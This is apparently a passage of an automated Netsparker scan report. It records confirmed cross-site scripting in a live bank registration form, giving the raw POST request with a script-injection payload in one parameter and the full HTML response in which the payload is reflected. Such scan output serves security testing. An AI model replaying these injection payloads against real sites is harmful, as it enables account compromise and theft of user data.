&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00012F)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;1&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;3&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BFEEDBACK_URL%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00012E)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 334
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00012E)%3c%2fscript%3e&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
